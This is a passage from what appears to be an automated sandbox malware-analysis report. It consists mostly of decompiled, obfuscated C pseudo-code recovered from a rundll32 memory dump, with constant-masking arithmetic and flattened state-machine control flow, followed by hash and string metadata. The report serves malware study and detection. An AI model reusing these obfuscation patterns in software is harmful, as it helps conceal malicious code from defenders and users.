                                                                                                                      				_v44 = _v44 * 0x74;
                                                                                                                      				_v44 = _v44 ^ 0x480bdaeb;
                                                                                                                      				_v100 = 0xb1cacc;
                                                                                                                      				_v100 = _v100 ^ 0xb6415150;
                                                                                                                      				_v100 = _v100 / _t277;
                                                                                                                      				_t278 = 0x13;
                                                                                                                      				_v100 = _v100 * 0x1c;
                                                                                                                      				_v100 = _v100 ^ 0x667becf7;
                                                                                                                      				_v84 = 0x7272f5;
                                                                                                                      				_v84 = _v84 | 0x49285dda;
                                                                                                                      				_v84 = _v84 / _t278;
                                                                                                                      				_v84 = _v84 ^ 0x03db0e7b;
                                                                                                                      				_v32 = 0x23e0bb;
                                                                                                                      				_v32 = _v32 ^ 0xc1a40ef0;
                                                                                                                      				_v32 = _v32 ^ 0xc18ab8c7;
                                                                                                                      				_v36 = 0x934e6;
                                                                                                                      				_v36 = _v36 >> 8;
                                                                                                                      				_v36 = _v36 ^ 0x000f952f;
                                                                                                                      				_v76 = 0x57f010;
                                                                                                                      				_t279 = 0x55;
                                                                                                                      				_v76 = _v76 / _t279;
                                                                                                                      				_v76 = _v76 | 0x3f39553c;
                                                                                                                      				_v76 = _v76 ^ 0x3f3ef260;
                                                                                                                      				_v40 = 0x93d6f8;
                                                                                                                      				_v40 = _v40 >> 6;
                                                                                                                      				_v40 = _v40 ^ 0x000a0563;
                                                                                                                      				_v60 = 0x62e666;
                                                                                                                      				_v60 = _v60 ^ 0x6bd8a41b;
                                                                                                                      				_v60 = _v60 * 0x61;
                                                                                                                      				_v60 = _v60 ^ 0xd19d18b1;
                                                                                                                      				_v88 = 0xe2190a;
                                                                                                                      				_v88 = _v88 * 0x56;
                                                                                                                      				_v88 = _v88 << 0x10;
                                                                                                                      				_v88 = _v88 * 0x2c;
                                                                                                                      				_v88 = _v88 ^ 0x1bd8b0be;
                                                                                                                      				_v64 = 0x7df3ba;
                                                                                                                      				_v64 = _v64 >> 3;
                                                                                                                      				_v64 = _v64 << 8;
                                                                                                                      				_v64 = _v64 ^ 0x0fbc3045;
                                                                                                                      				goto L1;
                                                                                                                      				do {
                                                                                                                      					while(1) {
                                                                                                                      						L1:
                                                                                                                      						_t309 = _t299 - 0x5b9992e;
                                                                                                                      						if(_t309 > 0) {
                                                                                                                      							break;
                                                                                                                      						}
                                                                                                                      						if(_t309 == 0) {
                                                                                                                      							_t253 = E0018274F();
                                                                                                                      							_t301 = _t301 - 0xc + 0xc;
                                                                                                                      							_t299 = 0x4369ff;
                                                                                                                      							_t298 = _t298 + _t253;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t299 == 0x4369ff) {
                                                                                                                      								_t298 = _t298 + E0017B782(_t271 + 0x1c, _v60, _v88, _v64);
                                                                                                                      							} else {
                                                                                                                      								if(_t299 == 0x240c704) {
                                                                                                                      									_t260 = E0018274F();
                                                                                                                      									_t301 = _t301 - 0xc + 0xc;
                                                                                                                      									_t299 = 0x5b9992e;
                                                                                                                      									_t298 = _t298 + _t260;
                                                                                                                      									continue;
                                                                                                                      								} else {
                                                                                                                      									if(_t299 == 0x412d246) {
                                                                                                                      										_t299 = 0x80cf0f0;
                                                                                                                      										continue;
                                                                                                                      									} else {
                                                                                                                      										if(_t299 != 0x47dcd1e) {
                                                                                                                      											goto L17;
                                                                                                                      										} else {
                                                                                                                      											_t265 = E0018274F();
                                                                                                                      											_t301 = _t301 - 0xc + 0xc;
                                                                                                                      											_t299 = 0x240c704;
                                                                                                                      											_t298 = _t298 + _t265;
                                                                                                                      											continue;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L20:
                                                                                                                      						return _t298;
                                                                                                                      					}
                                                                                                                      					if(_t299 == 0x80cf0f0) {
                                                                                                                      						_t243 = E0017B782(_t271 + 8, _v4, _v8, _v12);
                                                                                                                      						_t301 =  &(_t301[2]);
                                                                                                                      						_t299 = 0xe2e5f52;
                                                                                                                      						_t298 = _t298 + _t243;
                                                                                                                      						goto L17;
                                                                                                                      					} else {
                                                                                                                      						if(_t299 == 0xa9f5c45) {
                                                                                                                      							_t248 = E0018274F();
                                                                                                                      							_t301 = _t301 - 0xc + 0xc;
                                                                                                                      							_t299 = 0x47dcd1e;
                                                                                                                      							_t298 = _t298 + _t248;
                                                                                                                      							goto L1;
                                                                                                                      						} else {
                                                                                                                      							if(_t299 != 0xe2e5f52) {
                                                                                                                      								goto L17;
                                                                                                                      							} else {
                                                                                                                      								_t270 = E0018274F();
                                                                                                                      								_t301 = _t301 - 0xc + 0xc;
                                                                                                                      								_t299 = 0xa9f5c45;
                                                                                                                      								_t298 = _t298 + _t270;
                                                                                                                      								goto L1;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					goto L20;
                                                                                                                      					L17:
                                                                                                                      				} while (_t299 != 0xe1ba840);
                                                                                                                      				goto L20;
                                                                                                                      			}
















































                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %{p$':Q$<U9?$fb$uy?${$s*$4
                                                                                                                      • API String ID: 0-3558008229
                                                                                                                      • Opcode ID: 84da1592223dd1f04f0f3a6d750a6106e25ec91bc4b6139091f670668cf43936
                                                                                                                      • Instruction ID: d0f41f389ec861c8bcedaf49e22f6ecbfb46d68cbd5b1916d0081ab2974a104c
                                                                                                                      • Opcode Fuzzy Hash: 84da1592223dd1f04f0f3a6d750a6106e25ec91bc4b6139091f670668cf43936
                                                                                                                      • Instruction Fuzzy Hash: 55B123729083819FC358DF69D58A40BFBF1BBD4348F118A2DF4959A260D3B5DA48CF86
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 78%
                                                                                                                      			E0017194C(void* __ecx, signed int __edx, void* __edi, void* __eflags, signed int _a4, intOrPtr _a8, char _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				unsigned int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				intOrPtr _v156;
                                                                                                                      				char _v176;
                                                                                                                      				short _v720;
                                                                                                                      				short _v722;
                                                                                                                      				char _v724;
                                                                                                                      				signed int _v768;
                                                                                                                      				char _v1288;
                                                                                                                      				char _v1808;
                                                                                                                      				void* _t336;
                                                                                                                      				signed int _t361;
                                                                                                                      				intOrPtr _t370;
                                                                                                                      				void* _t373;
                                                                                                                      				signed int _t379;
                                                                                                                      				signed int _t394;
                                                                                                                      				void* _t407;
                                                                                                                      				signed int _t422;
                                                                                                                      				signed int _t423;
                                                                                                                      				signed int _t424;
                                                                                                                      				signed int _t425;
                                                                                                                      				signed int _t426;
                                                                                                                      				signed int _t427;
                                                                                                                      				void* _t434;
                                                                                                                      				void* _t435;
                                                                                                                      				void* _t436;
                                                                                                                      
                                                                                                                      				_t394 = __edx ^  *(__edi + 3);
                                                                                                                      				asm("int 0x55");
                                                                                                                      				_t435 = _t434 - 0x710;
                                                                                                                      				_t370 = _a8;
                                                                                                                      				_push(__edi);
                                                                                                                      				_push(_a20);
                                                                                                                      				if(__eflags == 0) {
                                                                                                                      					_push(_a16);
                                                                                                                      					_push(_a12);
                                                                                                                      					_push(_t370);
                                                                                                                      					_push(_a4);
                                                                                                                      					_push(_t394);
                                                                                                                      					_push(__ecx);
                                                                                                                      					E0017CF25(_t336);
                                                                                                                      					_v16 = 0x6f572e;
                                                                                                                      				}
                                                                                                                      				_t436 = _t435 + 0x1c;
                                                                                                                      				_v16 = _v16 >> 0xb;
                                                                                                                      				_v16 = _v16 + 0xd52f;
                                                                                                                      				_t373 = 0x80f983c;
                                                                                                                      				_v16 = _v16 ^ 0x3310f03a;
                                                                                                                      				_v16 = _v16 ^ 0x33101333;
                                                                                                                      				_v60 = 0xed71dd;
                                                                                                                      				_v60 = _v60 ^ 0x2497a453;
                                                                                                                      				_t422 = 0x26;
                                                                                                                      				_v60 = _v60 * 0x72;
                                                                                                                      				_v60 = _v60 ^ 0x3eb60fda;
                                                                                                                      				_v112 = 0xa5b0b2;
                                                                                                                      				_v112 = _v112 + 0x8954;
                                                                                                                      				_v112 = _v112 ^ 0x00ada628;
                                                                                                                      				_v108 = 0xe5587e;
                                                                                                                      				_v108 = _v108 << 9;
                                                                                                                      				_v108 = _v108 ^ 0xcab3bbf0;
                                                                                                                      				_v92 = 0x4845fb;
                                                                                                                      				_v92 = _v92 + 0x365f;
                                                                                                                      				_v92 = _v92 + 0xdd1a;
                                                                                                                      				_v92 = _v92 ^ 0x004e95c0;
                                                                                                                      				_v88 = 0xa51f24;
                                                                                                                      				_v88 = _v88 ^ 0x4dc3992d;
                                                                                                                      				_v88 = _v88 >> 9;
                                                                                                                      				_v88 = _v88 ^ 0x002183c7;
                                                                                                                      				_v28 = 0x92b1f2;
                                                                                                                      				_v28 = _v28 + 0xdb28;
                                                                                                                      				_v28 = _v28 ^ 0xc5c4fb2d;
                                                                                                                      				_v28 = _v28 + 0xffff07a3;
                                                                                                                      				_v28 = _v28 ^ 0xc5543e55;
                                                                                                                      				_v56 = 0x45fcf7;
                                                                                                                      				_v56 = _v56 ^ 0x18f8a820;
                                                                                                                      				_v56 = _v56 / _t422;
                                                                                                                      				_v56 = _v56 ^ 0x00a79737;
                                                                                                                      				_v72 = 0xd5567a;
                                                                                                                      				_v72 = _v72 ^ 0x96c46f64;
                                                                                                                      				_v72 = _v72 + 0x1123;
                                                                                                                      				_v72 = _v72 ^ 0x96131221;
                                                                                                                      				_v128 = 0xd7fcd2;
                                                                                                                      				_v128 = _v128 | 0x19fc7ba7;
                                                                                                                      				_v128 = _v128 ^ 0x19f2013f;
                                                                                                                      				_v36 = 0xb63dda;
                                                                                                                      				_v36 = _v36 | 0x57c3443c;
                                                                                                                      				_v36 = _v36 >> 0xf;
                                                                                                                      				_v36 = _v36 >> 2;
                                                                                                                      				_v36 = _v36 ^ 0x000375d9;
                                                                                                                      				_v120 = 0x9784e5;
                                                                                                                      				_v120 = _v120 ^ 0x5442b457;
                                                                                                                      				_v120 = _v120 ^ 0x54d2e3fe;
                                                                                                                      				_v152 = 0x86b47c;
                                                                                                                      				_v152 = _v152 | 0x1a648f0d;
                                                                                                                      				_v152 = _v152 ^ 0x1ae2f95e;
                                                                                                                      				_v104 = 0xe16033;
                                                                                                                      				_v104 = _v104 + 0xffff0503;
                                                                                                                      				_v104 = _v104 ^ 0x00e7872e;
                                                                                                                      				_v140 = 0x7ced29;
                                                                                                                      				_v140 = _v140 + 0x937a;
                                                                                                                      				_v140 = _v140 ^ 0x00718bd8;
                                                                                                                      				_v148 = 0xa848b7;
                                                                                                                      				_v148 = _v148 ^ 0xa8d47762;
                                                                                                                      				_v148 = _v148 ^ 0xa87b6210;
                                                                                                                      				_v124 = 0xc4055c;
                                                                                                                      				_v124 = _v124 << 5;
                                                                                                                      				_v124 = _v124 ^ 0x1882bddf;
                                                                                                                      				_v80 = 0x58e97;
                                                                                                                      				_t423 = 0x7c;
                                                                                                                      				_v80 = _v80 / _t423;
                                                                                                                      				_v80 = _v80 + 0xffff9366;
                                                                                                                      				_v80 = _v80 ^ 0xfffe01cd;
                                                                                                                      				_v48 = 0x77db93;
                                                                                                                      				_t424 = 0x3a;
                                                                                                                      				_v48 = _v48 / _t424;
                                                                                                                      				_v48 = _v48 + 0xffffa5b4;
                                                                                                                      				_v48 = _v48 >> 6;
                                                                                                                      				_v48 = _v48 ^ 0x00036e08;
                                                                                                                      				_v132 = 0x4854bc;
                                                                                                                      				_t425 = 0x4c;
                                                                                                                      				_v132 = _v132 * 0x24;
                                                                                                                      				_v132 = _v132 ^ 0x0a23127f;
                                                                                                                      				_v84 = 0x297997;
                                                                                                                      				_v84 = _v84 / _t425;
                                                                                                                      				_t426 = 0x45;
                                                                                                                      				_v84 = _v84 * 0x5e;
                                                                                                                      				_v84 = _v84 ^ 0x003e8360;
                                                                                                                      				_v24 = 0xba7a12;
                                                                                                                      				_v24 = _v24 << 9;
                                                                                                                      				_v24 = _v24 ^ 0x8e2fa782;
                                                                                                                      				_v24 = _v24 + 0xffffcaa3;
                                                                                                                      				_v24 = _v24 ^ 0xfad920cc;
                                                                                                                      				_v64 = 0xf87d94;
                                                                                                                      				_v64 = _v64 >> 3;
                                                                                                                      				_v64 = _v64 >> 4;
                                                                                                                      				_v64 = _v64 ^ 0x0002c2de;
                                                                                                                      				_v68 = 0x627eea;
                                                                                                                      				_v68 = _v68 >> 0xe;
                                                                                                                      				_v68 = _v68 | 0x4b478a8f;
                                                                                                                      				_v68 = _v68 ^ 0x4b4b50ae;
                                                                                                                      				_v32 = 0x4d9af3;
                                                                                                                      				_v32 = _v32 + 0xffff3fdf;
                                                                                                                      				_v32 = _v32 | 0x07023235;
                                                                                                                      				_v32 = _v32 ^ 0xa9cb8ace;
                                                                                                                      				_v32 = _v32 ^ 0xae825d6e;
                                                                                                                      				_v144 = 0x2c231c;
                                                                                                                      				_v144 = _v144 ^ 0x372f588c;
                                                                                                                      				_v144 = _v144 ^ 0x37050cc1;
                                                                                                                      				_v40 = 0xed36d5;
                                                                                                                      				_v40 = _v40 / _t426;
                                                                                                                      				_v40 = _v40 + 0xffff2e56;
                                                                                                                      				_v40 = _v40 * 0xd;
                                                                                                                      				_v40 = _v40 ^ 0x002f5a10;
                                                                                                                      				_v20 = 0xb226b9;
                                                                                                                      				_v20 = _v20 << 5;
                                                                                                                      				_v20 = _v20 ^ 0x7ec33512;
                                                                                                                      				_v20 = _v20 ^ 0x86eef9df;
                                                                                                                      				_v20 = _v20 ^ 0xee6f0a5e;
                                                                                                                      				_v76 = 0xa2d2;
                                                                                                                      				_v76 = _v76 + 0xffff2403;
                                                                                                                      				_v76 = _v76 + 0xffff5c56;
                                                                                                                      				_v76 = _v76 ^ 0xfff84be5;
                                                                                                                      				_v12 = 0x61529e;
                                                                                                                      				_v12 = _v12 + 0x826f;
                                                                                                                      				_v12 = _v12 | 0x315ab852;
                                                                                                                      				_v12 = _v12 >> 0xa;
                                                                                                                      				_v12 = _v12 ^ 0x0008d08d;
                                                                                                                      				_v136 = 0xbe89c0;
                                                                                                                      				_v136 = _v136 ^ 0x9f3b785a;
                                                                                                                      				_v136 = _v136 ^ 0x9f8a2ffd;
                                                                                                                      				_v116 = 0x9615af;
                                                                                                                      				_v116 = _v116 | 0x7dcb4113;
                                                                                                                      				_v116 = _v116 ^ 0x7dd5a359;
                                                                                                                      				_v100 = 0x787e8d;
                                                                                                                      				_t427 = 0xf;
                                                                                                                      				_v100 = _v100 * 0x78;
                                                                                                                      				_v100 = _v100 ^ 0x3874d75c;
                                                                                                                      				_v96 = 0xce992e;
                                                                                                                      				_v96 = _v96 << 9;
                                                                                                                      				_v96 = _v96 | 0x5045bce0;
                                                                                                                      				_v96 = _v96 ^ 0xdd755c45;
                                                                                                                      				_v52 = 0xe3c541;
                                                                                                                      				_t419 = _v100;
                                                                                                                      				_v52 = _v52 / _t427;
                                                                                                                      				_v52 = _v52 + 0xffff4fb9;
                                                                                                                      				_v52 = _v52 | 0x0dbfd8b3;
                                                                                                                      				_v52 = _v52 ^ 0x0db5e533;
                                                                                                                      				_v44 = 0xd3f0eb;
                                                                                                                      				_v44 = _v44 | 0x02fbd4da;
                                                                                                                      				_v44 = _v44 >> 6;
                                                                                                                      				_v44 = _v44 + 0xffffa89e;
                                                                                                                      				_v44 = _v44 ^ 0x000772a1;
                                                                                                                      				while(1) {
                                                                                                                      					L6:
                                                                                                                      					_t407 = 0x2e;
                                                                                                                      					L7:
                                                                                                                      					while(_t373 != 0xcf103a) {
                                                                                                                      						if(_t373 == 0x80f983c) {
                                                                                                                      							_v156 = _t370;
                                                                                                                      							_t373 = 0xcf103a;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t373 == 0x8bdeaee) {
                                                                                                                      								__eflags = _v768 & _v16;
                                                                                                                      								if(__eflags == 0) {
                                                                                                                      									_t361 = _a16( &_v768,  &_v176);
                                                                                                                      									asm("sbb ecx, ecx");
                                                                                                                      									_t379 =  ~_t361 & 0x01058edd;
                                                                                                                      									goto L14;
                                                                                                                      								} else {
                                                                                                                      									__eflags = _v724 - _t407;
                                                                                                                      									if(_v724 != _t407) {
                                                                                                                      										L23:
                                                                                                                      										__eflags = _a4;
                                                                                                                      										if(__eflags != 0) {
                                                                                                                      											_push(_v48);
                                                                                                                      											_push(_v80);
                                                                                                                      											_push(0x171264);
                                                                                                                      											E0017E7CE(E0017AB66(_v148, _v124, __eflags), __eflags, _v132, _t370, _v148, _v84, _v24, _v64, _v68,  &_v724);
                                                                                                                      											_push(_v40);
                                                                                                                      											_push(_a16);
                                                                                                                      											_t311 =  &_a12; // 0xee6f0a5e
                                                                                                                      											_push( *_t311);
                                                                                                                      											_push( &_v1808);
                                                                                                                      											_push(_a4);
                                                                                                                      											L1();
                                                                                                                      											_t436 = _t436 + 0x40;
                                                                                                                      											_t361 = E0017AE03(_v20, _v76, _v12, _t364);
                                                                                                                      											_t407 = 0x2e;
                                                                                                                      										}
                                                                                                                      									} else {
                                                                                                                      										__eflags = _v722;
                                                                                                                      										if(__eflags != 0) {
                                                                                                                      											__eflags = _v722 - _t407;
                                                                                                                      											if(_v722 != _t407) {
                                                                                                                      												goto L23;
                                                                                                                      											} else {
                                                                                                                      												__eflags = _v720;
                                                                                                                      												if(__eflags != 0) {
                                                                                                                      													goto L23;
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      									_t373 = 0xfa4bede;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      								L32:
                                                                                                                      							} else {
                                                                                                                      								if(_t373 == 0x8fff290) {
                                                                                                                      									_t361 = E0018BAEA( &_v1288, _v152,  &_v768, _v104, _v140);
                                                                                                                      									_t419 = _t361;
                                                                                                                      									_t436 = _t436 + 0xc;
                                                                                                                      									__eflags = _t361 - 0xffffffff;
                                                                                                                      									if(__eflags != 0) {
                                                                                                                      										_t373 = 0x8bdeaee;
                                                                                                                      										goto L6;
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									if(_t373 == 0xe9f3001) {
                                                                                                                      										_t361 = E00188C35(_v100, _t419, _v96, _v52, _v44);
                                                                                                                      									} else {
                                                                                                                      										if(_t373 != 0xfa4bede) {
                                                                                                                      											L28:
                                                                                                                      											__eflags = _t373 - 0x71f77cc;
                                                                                                                      											if(__eflags != 0) {
                                                                                                                      												continue;
                                                                                                                      											} else {
                                                                                                                      											}
                                                                                                                      										} else {
                                                                                                                      											_t278 =  &_v768; // 0x15f5595f
                                                                                                                      											_t361 = E0018F7FC(_v136, _t419, _v116, _t278);
                                                                                                                      											asm("sbb ecx, ecx");
                                                                                                                      											_t379 =  ~_t361 & 0xfa1ebaed;
                                                                                                                      											L14:
                                                                                                                      											_t373 = _t379 + 0xe9f3001;
                                                                                                                      											while(1) {
                                                                                                                      												L6:
                                                                                                                      												_t407 = 0x2e;
                                                                                                                      												goto L7;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						return _t361;
                                                                                                                      						goto L32;
                                                                                                                      					}
                                                                                                                      					_push(_v92);
                                                                                                                      					_push(_v108);
                                                                                                                      					_push(0x1712d4);
                                                                                                                      					E00173BF8(_v28, __eflags, E0017AB66(_v60, _v112, __eflags), _v56, _v72,  &_v1288, _t370);
                                                                                                                      					E0017AE03(_v128, _v36, _v120, _t354);
                                                                                                                      					_t436 = _t436 + 0x28;
                                                                                                                      					_t373 = 0x8fff290;
                                                                                                                      					_t407 = 0x2e;
                                                                                                                      					goto L28;
                                                                                                                      				}
                                                                                                                      			}

                                                                                                                      0x00171cc5
                                                                                                                      0x00171cc9
                                                                                                                      0x00171cd0
                                                                                                                      0x00171cda
                                                                                                                      0x00171ce6
                                                                                                                      0x00171cf0
                                                                                                                      0x00171cf7
                                                                                                                      0x00171cfe
                                                                                                                      0x00171d05
                                                                                                                      0x00171d12
                                                                                                                      0x00171d13
                                                                                                                      0x00171d16
                                                                                                                      0x00171d1d
                                                                                                                      0x00171d24
                                                                                                                      0x00171d28
                                                                                                                      0x00171d2f
                                                                                                                      0x00171d36
                                                                                                                      0x00171d42
                                                                                                                      0x00171d45
                                                                                                                      0x00171d48
                                                                                                                      0x00171d4f
                                                                                                                      0x00171d56
                                                                                                                      0x00171d5d
                                                                                                                      0x00171d64
                                                                                                                      0x00171d6b
                                                                                                                      0x00171d6f
                                                                                                                      0x00171d76
                                                                                                                      0x00171d7d
                                                                                                                      0x00171d7d
                                                                                                                      0x00171d7f
                                                                                                                      0x00000000
                                                                                                                      0x00171d80
                                                                                                                      0x00171d92
                                                                                                                      0x00171f11
                                                                                                                      0x00171f17
                                                                                                                      0x00000000
                                                                                                                      0x00171d98
                                                                                                                      0x00171d9e
                                                                                                                      0x00171e2d
                                                                                                                      0x00171e33
                                                                                                                      0x00171efd
                                                                                                                      0x00171f04
                                                                                                                      0x00171f06
                                                                                                                      0x00000000
                                                                                                                      0x00171e39
                                                                                                                      0x00171e39
                                                                                                                      0x00171e40
                                                                                                                      0x00171e69
                                                                                                                      0x00171e69
                                                                                                                      0x00171e6d
                                                                                                                      0x00171e6f
                                                                                                                      0x00171e72
                                                                                                                      0x00171e7e
                                                                                                                      0x00171ead
                                                                                                                      0x00171eb2
                                                                                                                      0x00171ec1
                                                                                                                      0x00171ec7
                                                                                                                      0x00171ec7
                                                                                                                      0x00171eca
                                                                                                                      0x00171ecb
                                                                                                                      0x00171ece
                                                                                                                      0x00171ed3
                                                                                                                      0x00171ee0
                                                                                                                      0x00171ee9
                                                                                                                      0x00171ee9
                                                                                                                      0x00171e42
                                                                                                                      0x00171e42
                                                                                                                      0x00171e4a
                                                                                                                      0x00171e4c
                                                                                                                      0x00171e53
                                                                                                                      0x00000000
                                                                                                                      0x00171e55
                                                                                                                      0x00171e55
                                                                                                                      0x00171e5d
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00171e5d
                                                                                                                      0x00171e53
                                                                                                                      0x00171e4a
                                                                                                                      0x00171e5f
                                                                                                                      0x00000000
                                                                                                                      0x00171e5f
                                                                                                                      0x00000000
                                                                                                                      0x00171da4
                                                                                                                      0x00171daa
                                                                                                                      0x00171e0d
                                                                                                                      0x00171e12
                                                                                                                      0x00171e14
                                                                                                                      0x00171e17
                                                                                                                      0x00171e1a
                                                                                                                      0x00171e20
                                                                                                                      0x00000000
                                                                                                                      0x00171e20
                                                                                                                      0x00171dac
                                                                                                                      0x00171db2
                                                                                                                      0x00171f8c
                                                                                                                      0x00171db8
                                                                                                                      0x00171dbe
                                                                                                                      0x00171f70
                                                                                                                      0x00171f70
                                                                                                                      0x00171f76
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00171f7c
                                                                                                                      0x00171dc4
                                                                                                                      0x00171dc4
                                                                                                                      0x00171dd6
                                                                                                                      0x00171de1
                                                                                                                      0x00171de3
                                                                                                                      0x00171de9
                                                                                                                      0x00171de9
                                                                                                                      0x00171d7d
                                                                                                                      0x00171d7d
                                                                                                                      0x00171d7f
                                                                                                                      0x00000000
                                                                                                                      0x00171d7f
                                                                                                                      0x00171d7d
                                                                                                                      0x00171dbe
                                                                                                                      0x00171db2
                                                                                                                      0x00171daa
                                                                                                                      0x00171d9e
                                                                                                                      0x00171f9a
                                                                                                                      0x00000000
                                                                                                                      0x00171f9a
                                                                                                                      0x00171f21
                                                                                                                      0x00171f24
                                                                                                                      0x00171f2d
                                                                                                                      0x00171f51
                                                                                                                      0x00171f60
                                                                                                                      0x00171f65
                                                                                                                      0x00171f68
                                                                                                                      0x00171f6f
                                                                                                                      0x00000000
                                                                                                                      0x00171f6f

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )|$.Wo$3`$^o$_6$~X$~b
                                                                                                                      • API String ID: 0-1767839032
                                                                                                                      • Opcode ID: eef91fe68660d8fda0360ca97d0afbe7e47c452db0b4903d5e0a85f4f344d683
                                                                                                                      • Instruction ID: ab9982e1fd34e1acfadeb7fb27cea3b02257f3add3a4c122da7db1bc447547e0
                                                                                                                      • Opcode Fuzzy Hash: eef91fe68660d8fda0360ca97d0afbe7e47c452db0b4903d5e0a85f4f344d683
                                                                                                                      • Instruction Fuzzy Hash: 2BC1F0B1C0135DDBDB68CFA5D98A5DEBFB1FB00318F208159D116BA264C7B84A8ACF54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E001804B8() {
                                                                                                                      				intOrPtr _v4;
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				intOrPtr _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				void* _t191;
                                                                                                                      				signed int _t193;
                                                                                                                      				signed int _t194;
                                                                                                                      				void* _t198;
                                                                                                                      				void* _t219;
                                                                                                                      				intOrPtr _t224;
                                                                                                                      				signed int _t225;
                                                                                                                      				signed int _t226;
                                                                                                                      				signed int _t227;
                                                                                                                      				signed int _t228;
                                                                                                                      				signed int _t229;
                                                                                                                      				signed int _t230;
                                                                                                                      				intOrPtr _t231;
                                                                                                                      				intOrPtr* _t232;
                                                                                                                      				signed int _t233;
                                                                                                                      				signed int* _t234;
                                                                                                                      
                                                                                                                      				_t234 =  &_v88;
                                                                                                                      				_v12 = 0x2790ea;
                                                                                                                      				_v8 = 0xba5a5c;
                                                                                                                      				_t198 = 0x3d69ab1;
                                                                                                                      				_t224 = 0;
                                                                                                                      				_v4 = 0;
                                                                                                                      				_v60 = 0x2fd7ed;
                                                                                                                      				_v60 = _v60 | 0x771a9d11;
                                                                                                                      				_t225 = 0x45;
                                                                                                                      				_v60 = _v60 * 0x4e;
                                                                                                                      				_v60 = _v60 ^ 0x55773f16;
                                                                                                                      				_v40 = 0xe86db6;
                                                                                                                      				_v40 = _v40 | 0xabe4da9c;
                                                                                                                      				_v40 = _v40 ^ 0xabe3ff81;
                                                                                                                      				_v84 = 0x4e4c43;
                                                                                                                      				_v84 = _v84 + 0x2260;
                                                                                                                      				_v84 = _v84 / _t225;
                                                                                                                      				_t226 = 0x36;
                                                                                                                      				_v84 = _v84 / _t226;
                                                                                                                      				_v84 = _v84 ^ 0x000c99de;
                                                                                                                      				_v36 = 0x2c2e8d;
                                                                                                                      				_v36 = _v36 ^ 0x89bc573f;
                                                                                                                      				_v36 = _v36 ^ 0x899e3850;
                                                                                                                      				_v56 = 0xc456b8;
                                                                                                                      				_v56 = _v56 << 1;
                                                                                                                      				_t227 = 0x7a;
                                                                                                                      				_v56 = _v56 / _t227;
                                                                                                                      				_v56 = _v56 ^ 0x000dd00d;
                                                                                                                      				_v24 = 0x6eec6c;
                                                                                                                      				_v24 = _v24 * 0x67;
